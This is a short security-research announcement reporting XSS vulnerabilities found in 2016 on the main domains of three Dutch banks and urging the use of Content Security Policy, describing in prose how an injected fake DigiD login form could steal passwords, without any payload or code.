Banking websites and XSS: it's time for CSP

DongIT once again finds vulnerabilities at banking websites: a year after the event

In January 2015, DongIT proved that 10 Dutch banking websites were vulnerable for cross site-scripting (XSS) on their main domain. Approximately a year later, in August 2016, DongIT executed a new security research.

Goal of the research: to find out whether banks are now using an extra security layer, named Content Security Policy, to prevent repetition.

Result of the research: again new XSS-vulnerabilities were found on the main domains of ABN Amro, Triodos and SNS bank.

Download the full article here (only available in Dutch): Banking websites and XSS: time for CSP v1.0

Why are these findings important?

The impact of a XSS-vulnerability is most critical on the main domain (i.e. or on the banking domain of the bank, because this is familiar to the visitor and banking transactions take place here. The web address will appear unchanged in the address bar, including the trustmark-lock – despite the attack. On account of the trustworthy character it is possible trick the visitor in believing they are logging in with their DigiD-account (Dutch authentication system offered by the government), while data is sent to the attacker in the background.

Following is an example of a XSS-attack on the main domain of ABN Amro. A form is injected in the website which cannot be distinguished from a real form. It appears to be possible to log in with DigiD. The trustworthiness of the domain in general, will not make most visitors suspicious about this. Passwords are sent to the attacker in the background.

Another example is the following simple and remarkable manipulation of the website, showing the attacker has complete control over the banking websites' browser.

The video of the previous research (2015) is shown below. This video shows 10 banking websites doing the "Harlem Shake" on its root domain.